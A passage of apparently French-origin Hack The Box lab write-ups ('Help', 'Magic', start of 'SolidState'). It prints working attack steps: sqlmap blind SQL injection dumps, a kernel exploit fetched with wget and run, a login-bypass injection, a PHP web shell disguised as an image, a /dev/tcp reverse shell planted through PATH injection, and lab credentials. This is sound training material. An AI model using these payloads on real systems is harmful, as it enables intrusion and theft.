canned_response | | custom_fields | | departments | | emails | | error_log | | file_types | | knowledgebase_category | | login_attempt | | login_log | | news | | pages | | priority | | settings | | staff | | tickets | | tickets_messages | | users | +--+ 19 rows in set (0.00 sec) mysql\u0026gt; select * from staff; +----+----------+--------------------+---------------+--------------------+------------+------------+--------------------+----------+--------+--+--------+-------+--------+ | id | username | password | fullname | email | login | last_login | department | timezone | signature | newticket_notification | avatar | admin | status | +----+----------+--------------------+---------------+--------------------+------------+------------+--------------------+----------+--------+--+--------+-------+--------+ | 1 | admin | d318f44739dced66793b1a603028133a76ae680e | Administrator | support@mysite.com | 1547216217 | 1543429746 | a:1:{i:0;s:1:\u0026#34;1\u0026#34;;} | | Best regards, Administrator | 0 | NULL | 1 | Enable | +----+----------+--------------------+---------------+--------------------+------------+------------+--------------------+----------+--------+--+--------+-------+--------+ 1 row in set (0.00 sec) mysql\u0026gt; exit; En utilisant crackstation.net, on tente de retrouver le mot de passe relié au hachage et on obtient: d318f44739dced66793b1a603028133a76ae680e -\u0026gt; Welcome1\nOn peut maintenant se connecter en SSH avec le compte help et ce mot de passe (PASSWORD REUSE\u0026hellip;) :\n1 2 3 4 5 6 7 8 9 10 ssh help@help.htb help@help.htb\u0026#39;s password: Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-116-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage You have new mail. 
Last login: Fri Jan 11 06:18:50 2019 help@help:~$ Privilege Escalation Vulnerable Kernel : Linux version 4.4.0-116-generic Using linpeas, we find the kernel version, which looks a bit old (Feb 12 21:23:04 UTC 2018) while the machine dates from January 2019. We search the internet and searchsploit to see whether this kernel is vulnerable.\nIt seems that Linux kernels below this version are vulnerable but not this one, i.e. < 4.4.0-116-generic. From what I have learned, it is always worth checking anyway whether an exploit works for a version, even when it is listed as \"<\". Sometimes \"<\" is actually \"<=\".\n══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 Distributor ID:\tUbuntu Description:\tUbuntu 16.04.5 LTS Release:\t16.04 Codename:\txenial I grabbed the exploit found on searchsploit:\nsearchsploit 4.4.0-116 - ------------------------------------------------------- Exploit Title - ------------------------------------------------------- Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation I then just had to download it onto the machine, compile it with gcc and run it to get a root shell:\nhelp@help:~$ wget http://10.10.16.10:8000/44298.c --2025-08-27 05:09:41-- http://10.10.16.10:8000/44298.c Connecting 
to 10.10.16.10:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 5773 (5.6K) [text/x-csrc] Saving to: ‘44298.c’ 44298.c 100%[=====================================================================================================================>] 5.64K --.-KB/s in 0.01s 2025-08-27 05:09:42 (384 KB/s) - ‘44298.c’ saved [5773/5773] help@help:~$ gcc 44298.c -o exploit help@help:~$ chmod +x exploit help@help:~$ ./exploit task_struct = ffff880015b98e00 uidptr = ffff8800192f7c04 spawning root shell root@help:~# whoami root root@help:~# cat /root/root.txt 924b.....f182 Bonus CVE : SQL Injection (Authenticated) First, we log in to HelpdeskZ with the credentials found via GraphQL. Then we submit a ticket with an attachment (no need for a PHP file, any file will do). Next, we go to our tickets and try to download the attachment. We intercept the request in Burp; it is then enough to save it to a file and pass it to sqlmap:\nGET /support/?v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=5&param[]=10 HTTP/1.1 Host: help.htb User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://help.htb/support/?v=view_tickets&action=ticket&param[]=8 Cookie: lang=english; PHPSESSID=dh62bg5tt2j2gk4bofntn637q5; usrhash=0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BEWTAAjyRu71c6GI%2BULmLmTqISzoi3A27eA1M9ErCXvXw%3D%3D Upgrade-Insecure-Requests: 1 Priority: u=0, i We save this 
request to a file, ticket.req.\nWe run sqlmap:\n------------------------------------------------ $ sqlmap -r ticket.req --batch --dbs --thread 10 ___ __H__ ___ ___[']_____ ___ ___ {1.9.3.3#dev} |_ -| . [.] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:37:53 /2025-08-27/ [14:37:53] [INFO] parsing HTTP request from 'ticket.req' [14:37:53] [INFO] resuming back-end DBMS 'mysql' [14:37:53] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: param[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=5&param[]=10 AND 2859=2859 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=5&param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) --- [14:37:53] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0.12 [14:37:53] [INFO] fetching database names [14:37:53] [INFO] fetching number of databases [14:37:53] [INFO] retrieved: 5 [14:37:54] [INFO] retrieving the length of query output [14:37:54] [INFO] retrieved: 18 [14:37:58] [INFO] retrieved: information_schema [14:37:58] [INFO] retrieving the length of query output [14:37:58] [INFO] retrieved: 5 [14:38:00] [INFO] retrieved: mysql [14:38:00] [INFO] retrieving the length of query output [14:38:00] [INFO] retrieved: 18 [14:38:03] [INFO] retrieved: performance_schema [14:38:03] [INFO] retrieving the length of query output [14:38:03] [INFO] retrieved: 7 [14:38:06] [INFO] retrieved: support [14:38:06] [INFO] retrieving the length of query output [14:38:06] [INFO] retrieved: 3 [14:38:07] [INFO] retrieved: sys available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] support [*] sys 
[14:38:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/help.htb' [*] ending @ 14:38:07 /2025-08-27/ -------------------------------------------------------------- $ sqlmap -r ticket.req --batch --thread 10 -D support --tables ___ __H__ ___ ___[\"]_____ ___ ___ {1.9.3.3#dev} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:38:50 /2025-08-27/ [14:38:50] [INFO] parsing HTTP request from 'ticket.req' [14:38:50] [INFO] resuming back-end DBMS 'mysql' [14:38:50] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: param[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=5&param[]=10 AND 2859=2859 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=5&param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) --- [14:38:51] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0.12 [14:38:51] [INFO] fetching tables for database: 'support' [14:38:51] [INFO] fetching number of tables for database 'support' [14:38:51] [INFO] retrieved: 19 ... ... 
[14:39:34] [INFO] retrieved: 5 [14:39:36] [INFO] retrieved: staff [14:39:36] [INFO] retrieving the length of query output [14:39:36] [INFO] retrieved: 7 [14:39:39] [INFO] retrieved: tickets [14:39:39] [INFO] retrieving the length of query output [14:39:39] [INFO] retrieved: 16 [14:39:42] [INFO] retrieved: tickets_messages [14:39:42] [INFO] retrieving the length of query output [14:39:42] [INFO] retrieved: 5 [14:39:44] [INFO] retrieved: users Database: support [19 tables] +------------------------+ | articles | | attachments | | canned_response | | custom_fields | | departments | | emails | | error_log | | file_types | | knowledgebase_category | | login_attempt | | login_log | | news | | pages | | priority | | settings | | staff | | tickets | | tickets_messages | | users | +------------------------+ [14:39:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/help.htb' [*] ending @ 14:39:44 /2025-08-27/ ---------------------------------------------------------------------- $ sqlmap -r ticket.req --batch --thread 10 -D support -T staff --columns ___ __H__ ___ ___[)]_____ ___ ___ {1.9.3.3#dev} |_ -| . [,] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:40:14 /2025-08-27/ [14:40:14] [INFO] parsing HTTP request from 'ticket.req' [14:40:15] [INFO] resuming back-end DBMS 'mysql' [14:40:15] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: param[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=5&param[]=10 AND 2859=2859 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=5&param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) --- [14:40:15] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0.12 [14:40:15] [INFO] fetching columns for table 'staff' in database 'support' [14:40:15] [INFO] retrieved: 14 [14:40:16] [INFO] retrieving the length of query output [14:40:16] [INFO] retrieved: 2 [14:40:17] [INFO] retrieved: id [14:40:17] [INFO] retrieving the length of query output [14:40:17] [INFO] retrieved: 7 ... ... 
[14:41:18] [INFO] retrieved: 5 [14:41:19] [INFO] retrieved: admin [14:41:19] [INFO] retrieving the length of query output [14:41:19] [INFO] retrieved: 6 [14:41:21] [INFO] retrieved: int(1) [14:41:21] [INFO] retrieving the length of query output [14:41:21] [INFO] retrieved: 6 [14:41:24] [INFO] retrieved: status [14:41:24] [INFO] retrieving the length of query output [14:41:24] [INFO] retrieved: 24 [14:41:28] [INFO] retrieved: enum('Enable','Disable') Database: support Table: staff [14 columns] +------------------------+--------------------------+ | Column | Type | +------------------------+--------------------------+ | admin | int(1) | | status | enum('Enable','Disable') | | avatar | varchar(200) | | department | text | | email | varchar(255) | | fullname | varchar(100) | | id | int(11) | | last_login | int(11) | | login | int(11) | | newticket_notification | smallint(1) | | password | varchar(255) | | signature | mediumtext | | timezone | varchar(255) | | username | varchar(255) | +------------------------+--------------------------+ [14:41:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/help.htb' [*] ending @ 14:41:28 /2025-08-27/ ---------------------------------------------------------------------- $ sqlmap -r ticket.req --batch --thread 10 -D support -T staff --dump ___ __H__ ___ ___[(]_____ ___ ___ {1.9.3.3#dev} |_ -| . [\"] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 14:41:39 /2025-08-27/ [14:41:39] [INFO] parsing HTTP request from 'ticket.req' [14:41:39] [INFO] resuming back-end DBMS 'mysql' [14:41:39] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: param[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=5&param[]=10 AND 2859=2859 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: v=view_tickets&action=ticket&param[]=8&param[]=attachment&param[]=5&param[]=10 AND (SELECT 7344 FROM (SELECT(SLEEP(5)))Tifo) --- [14:41:39] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0.12 [14:41:39] [INFO] fetching columns for table 'staff' in database 'support' [14:41:39] [INFO] resumed: 14 ... ... 
[14:41:53] [INFO] retrieved: support@mysite.com [14:41:53] [INFO] retrieving the length of query output [14:41:53] [INFO] retrieved: 13 [14:41:56] [INFO] retrieved: Administrator [14:41:56] [INFO] retrieving the length of query output [14:41:56] [INFO] retrieved: 1 [14:41:57] [INFO] retrieved: 1 [14:41:58] [INFO] retrieving the length of query output [14:41:58] [INFO] retrieved: 10 [14:42:01] [INFO] retrieved: 1543429746 [14:42:01] [INFO] retrieving the length of query output [14:42:01] [INFO] retrieved: 10 [14:42:03] [INFO] retrieved: 1547216217 [14:42:03] [INFO] retrieving the length of query output [14:42:03] [INFO] retrieved: 1 [14:42:04] [INFO] retrieved: 0 [14:42:04] [INFO] retrieving the length of query output [14:42:04] [INFO] retrieved: 40 [14:42:12] [INFO] retrieved: d318f44739dced66793b1a603028133a76ae680e [14:42:12] [INFO] retrieving the length of query output [14:42:12] [INFO] retrieved: 28 [14:42:17] [INFO] retrieved: Best regards, Administrator [14:42:17] [INFO] retrieving the length of query output [14:42:17] [INFO] retrieved: 0 multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N [14:42:18] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. 
(done) [14:42:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [14:42:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [14:42:21] [INFO] retrieving the length of query output [14:42:21] [INFO] retrieved: 5 [14:42:23] [INFO] retrieved: admin [14:42:23] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [14:42:23] [INFO] using hash method 'sha1_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/opt/tools/sqlmap/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [14:42:23] [INFO] using default dictionary do you want to use common password suffixes? (slow!) 
[y/N] N [14:42:23] [INFO] starting dictionary-based cracking (sha1_generic_passwd) [14:42:23] [INFO] starting 12 processes [14:42:24] [INFO] cracked password 'Welcome1' for user 'admin' Database: support Table: staff [1 entry] +----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ | id | email | login | avatar | admin | status | fullname | password | timezone | username | signature | department | last_login | newticket_notification | +----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ | 1 | support@mysite.com | 1547216217 | NULL | 1 | Enable | Administrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) | <blank> | admin | Best regards,\\r\\nAdministrator | a:1:{i:0;s:1:\"1\";} | 1543429746 | 0 | +----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+ [14:42:30] [INFO] table 'support.staff' dumped to CSV file '/root/.local/share/sqlmap/output/help.htb/dump/support/staff.csv' [14:42:30] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/help.htb' [*] ending @ 14:42:30 /2025-08-27/ After using sqlmap, we did not need to run a dictionary attack on the hash ourselves. 
Indeed, sqlmap took care of it and found the password: \"d318f44739dced66793b1a603028133a76ae680e\" -> Welcome1.\nAll that is left is to log in over SSH as the help user with this password.\nTips When you find an exploitable version of a service, really push it as far as it goes. Try the exploit several times and with several different exploit codes. Check the kernel quickly, starting with its build date. Do a quick search for the version on the internet; it costs nothing and here it was indeed the solution. Linpeas will not highlight the kernel version. ","date":"2025-08-27T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/help-htb/","title":"HTB | Help"},{"content":" Machine name OS IP Difficulty CodeTwo Linux 10.10.11.82 Easy Soon :)\n","date":"2025-08-24T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/codetwo-htb/","title":"HTB | CodeTwo"},{"content":" Machine name OS IP Difficulty Magic Linux 10.10.10.185 Medium Users ## mysql theseus : `iamkingtheseus` admin : `Th3s3usW4sK1ng` Enumeration nmap $ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.185 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 06d489bf51f7fc0cf9085e9763648dca (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClcZO7AyXva0myXqRYz5xgxJ8ljSW1c6xX0vzHxP/Qy024qtSuDeQIRZGYsIR+kyje39aNw6HHxdz50XSBSEcauPLDWbIYLUMM+a0smh7/pRjfA+vqHxEp7e5l9H7Nbb1dzQesANxa1glKsEmKi1N8Yg0QHX0/FciFt1rdES9Y4b3I3gse2mSAfdNWn4ApnGnpy1tUbanZYdRtpvufqPWjzxUkFEnFIPrslKZoiQ+MLnp77DXfIm3PGjdhui0PBlkebTGbgo4+U44fniEweNJSkiaZW/CuKte0j/buSlBlnagzDl0meeT8EpBOPjk+F0v6Yr7heTuAZn75pO3l5RHX | 256 11a69298ce3540c729094f6c2d74aa66 (ECDSA) | ecdsa-sha2-nistp256 
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOVyH7ButfnaTRJb0CdXzeCYFPEmm6nkSUd4d52dW6XybW9XjBanHE/FM4kZ7bJKFEOaLzF1lDizNQgiffGWWLQ= | 256 7105991fa81b14d6038553f8788ecb88 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0dM4nfekm9dJWdTux9TqCyCGtW5rbmHfh/4v3NtTU1 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Magic Portfolio | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu) Foothold Website : login page We find a website on port 80 with a login page. The site tells us it allows image uploads. After trying several credential combinations (e.g. admin/admin, root/root...), we find a SQL injection that lets us log in\nuser: aaaa' or 1=1;-- password: aaaa' or 1=1;-- Using this as user and password, we get access to the upload.php page.\nUpload image : Exploit Magic Byte We can upload images with PHP code inside. For the PHP code to be executed and the file to be accepted, we had to:\nChange the magic bytes to those of an image XXX : Change the extension to \".php.jpg\" (or \".php.png\") In a single line of code, this gives:\necho -ne '\\xFF\\xD8\\xFF\\xE0<?php system($_GET[\"cmd\"]); ?>' > shell_magic.php.jpg We can then execute PHP code on the machine using the cmd parameter:\nhttp://10.10.10.185/images/uploads/shell_magic.php.jpg?cmd=id\nWhy does this work?\nThe server checks the file extension. Here the last extension is indeed \".jpg\", so our file passes the first test. Next, the server checks the magic bytes, which are several bytes written at the start of the file indicating the type: JPG, GIF, PHP. 
It is therefore enough to put the magic bytes of a PNG or JPG image at the start to pass this second layer of protection. Why is the PHP code executed? Apache processes every extension in a file name and stops at the first one it recognises as \"executable\" (such as .php), even if it is not the last one. Hence the importance of writing \".php.jpg\". If we only use \".jpg\", Apache will treat the file as an image and the code will not be executed.\nUsing the \"pentest monkey\" PHP reverse shell, we easily get a shell on the machine:\nnc -lnvp 9001 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.185. Ncat: Connection from 10.10.10.185:51964. Linux magic 5.3.0-42-generic #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 06:41:39 up 19:17, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) bash: cannot set terminal process group (1197): Inappropriate ioctl for device bash: no job control in this shell www-data@magic:/$ export TERM=xterm export TERM=xterm www-data@magic:/$ python3 -c 'import pty;pty.spawn(\"/bin/bash\")' python3 -c 'import pty;pty.spawn(\"/bin/bash\")' www-data@magic:/$ ^Z [1] + 9828 suspended nc -lnvp 9001 $ stty raw -echo;fg [1] + 9828 continued nc -lnvp 9001 www-data@magic:/$ whoami www-data mysql creds : db.php5 We find a database configuration file, db.php5\nwww-data@magic:/var/www/Magic$ cat db.php5 <?php class Database { private static $dbName = 'Magic' ; private static $dbHost = 
'localhost' ; private static $dbUsername = 'theseus'; private static $dbUserPassword = 'iamkingtheseus'; ... Mysql connection (chisel port forwarding) : admin creds We notice that the mysql port (3306) is indeed open; however, the mysql client is not installed, so we cannot connect to the database:\nwww-data@magic:/var/www/Magic$ ss -lntp State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* ... www-data@magic:/var/www/Magic$ mysql Command 'mysql' not found, but can be installed with: ... To work around this, I decided to use chisel for port forwarding, the goal being to reach the server's port 3306 from my host machine. To do this, just download the chisel binary from its GitHub page. Here are the commands to run:\nwww-data@magic:/var/www/Magic$ wget http://10.10.16.2/chisel --2025-07-24 07:00:58-- http://10.10.16.2/chisel Connecting to 10.10.16.2:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9371800 (8.9M) [application/octet-stream] Saving to: 'chisel' chisel 100%[===================>] 8.94M 336KB/s in 26s 2025-07-24 07:01:25 (351 KB/s) - 'chisel' saved [9371800/9371800] www-data@magic:/var/www/Magic$ ./chisel client 10.10.16.2:1082 R:3306:localhost:3306 > /dev/null 2> /dev/null & [1] 5146 .... 
----------------------- $ ./chisel server -p 1082 --reverse 2025/07/24 16:02:12 server: Reverse tunnelling enabled 2025/07/24 16:02:12 server: Fingerprint 4PDYwTjgAniyianMIlBvt3QRTZm4VpYL+kFf1nXfQPg= 2025/07/24 16:02:12 server: Listening on http://0.0.0.0:1082 2025/07/24 16:03:19 server: session#1: tun: proxy#R:3306=>localhost:3306: Listening From my host machine, I use the mysql command to connect to my local port 3306, which is forwarded to the server's port 3306. We then find a database \"Magic\" and a table \"login\" containing the following credentials: admin : Th3s3usW4sK1ng\n$ mysql -h 127.0.0.1 -P 3306 -u theseus -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \\g. Your MySQL connection id is 25 Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement. 
MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | Magic | +--------------------+ 2 rows in set (0.145 sec) MySQL [(none)]> use Magic; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [Magic]> show tables; +-----------------+ | Tables_in_Magic | +-----------------+ | login | +-----------------+ 1 row in set (0.136 sec) MySQL [Magic]> select * from login; +----+----------+----------------+ | id | username | password | +----+----------+----------------+ | 1 | admin | Th3s3usW4sK1ng | +----+----------+----------------+ 1 row in set (0.106 sec) theseus user : su We log in as theseus with the password found earlier. However, SSH only works with a public key pair.\nwww-data@magic:/var/www/Magic$ su theseus Password: <---- Th3s3usW4sK1ng theseus@magic:/var/www/Magic$ cat /home/theseus/user.txt 6553.....4c7a SSH : theseus To get a more stable shell, I generated an RSA key pair and added the public key to the authorized_keys file. Then it is just a matter of copying the private key to my host machine and connecting over SSH:\ntheseus@magic:~$ ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/home/theseus/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/theseus/.ssh/id_rsa. Your public key has been saved in /home/theseus/.ssh/id_rsa.pub. ... theseus@magic:~$ cd .ssh theseus@magic:~/.ssh$ cat id_rsa.pub > authorized_keys theseus@magic:~/.ssh$ cat id_rsa ... 
## [Ctrl-C, Ctrl-V] --> copy the private key to the host machine ------------------------- $ vim theseus.key ... $ chmod 600 theseus.key $ ssh theseus@10.10.10.185 -i theseus.key Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64) ... theseus@magic:~$ whoami theseus Privilege Escalation SUID binary : /bin/sysinfo Through enumeration with linpeas, we discover that the \"/bin/sysinfo\" binary has the SUID bit set.\ntheseus@magic:~$ cat linpeas.out | grep -i SUID ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid ... -rwsr-x--- 1 root users 22K Oct 21 2019 /bin/sysinfo (Unknown SUID binary!) ... fdisk execution in /bin/sysinfo To perform a \"PATH injection\" attack on the SUID binary, I could use strace, ltrace or strings:\ntheseus@magic:~/bin$ strings /bin/sysinfo | less /lib64/ld-linux-x86-64.so.2 libstdc++.so.6 __gmon_start__ _ITM_deregisterTMCloneTable ... ... ====================Hardware Info==================== lshw -short ====================Disk Info==================== fdisk -l ====================CPU Info==================== cat /proc/cpuinfo ====================MEM Usage===================== ... We observe that lshw, fdisk and cat are executed without an absolute path, e.g. /bin/cat. We can therefore do a PATH injection. 
I chose to do it with fdisk.\nCreating fake \"fdisk\" binary with reverse shell We create a fake fdisk binary in the bin/ folder, which we then add to the PATH:\ntheseus@magic:~$ mkdir bin;cd bin theseus@magic:~/bin$ nano fdisk #!/bin/bash bash -i >& /dev/tcp/10.10.16.2/1337 0>&1 theseus@magic:~/bin$ export PATH=\"/home/theseus/bin:$PATH\" Root shell using PATH injection We then run the /bin/sysinfo binary, which executes the fdisk command as root. Since my bin folder also contains an fdisk binary AND it comes first in the list of PATH directories, the program runs it instead of the real binary:\ntheseus@magic:~/bin$ /bin/sysinfo ====================Hardware Info==================== H/W path Device Class Description ==================================================== system VMware Virtual Platform /0 bus 440BX Desktop Reference Platform /0/0 memory 86KiB BIOS /0/1 processor AMD EPYC 7763 64-Core Processor /0/1/0 memory 16KiB L1 cache /0/1/1 memory 16KiB L1 cache /0/1/2 memory 512KiB L2 cache /0/1/3 memory 512KiB L2 cache ... ====================Disk Info==================== ------------------------------ $ nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.10.185. Ncat: Connection from 10.10.10.185:48804. 
root@magic:~/bin# whoami root root@magic:~# cd /root root@magic:/root# cat root.txt c21a.....fa6b ","date":"2025-07-24T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/magic-htb/","title":"HTB | Magic"},{"content":" Machine name OS IP Difficulty SolidState Linux 10.10.10.51 Medium Users mindy : P@55W0rd1!2@ Enumeration nmap $ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.51 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 770084f578b9c7d354cf712e0d526d8b (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp5WdwlckuF4slNUO29xOk/Yl/cnXT/p6qwezI0ye+4iRSyor8lhyAEku/yz8KJXtA+ALhL7HwYbD3hDUxDkFw90V1Omdedbk7SxUVBPK2CiDpvXq1+r5fVw26WpTCdawGKkaOMYoSWvliBsbwMLJEUwVbZ/GZ1SUEswpYkyZeiSC1qk72L6CiZ9/5za4MTZw8Cq0akT7G+mX7Qgc+5eOEGcqZt3cBtWzKjHyOZJAEUtwXAHly29KtrPUddXEIF0qJUxKXArEDvsp7OkuQ0fktXXkZuyN/GRFeu3im7uQVuDgiXFKbEfmoQAsvLrR8YiKFUG6QBdI9awwmTkLFbS1Z | 256 78b83af660190691f553921d3f48ed53 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBISyhm1hXZNQl3cslogs5LKqgWEozfjs3S3aPy4k3riFb6UYu6Q1QsxIEOGBSPAWEkevVz1msTrRRyvHPiUQ+eE= | 256 e445e9ed074d7369435a12709dc4af76 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKbFbK3MJqjMh9oEw/2OVe0isA7e3ruHz5fhUP4cVgY 25/tcp open smtp syn-ack ttl 63 JAMES smtpd 2.3.2 |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.3 [10.10.14.3]) 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.25 ((Debian)) | http-methods: |_ Supported Methods: OPTIONS HEAD GET POST 110/tcp open pop3 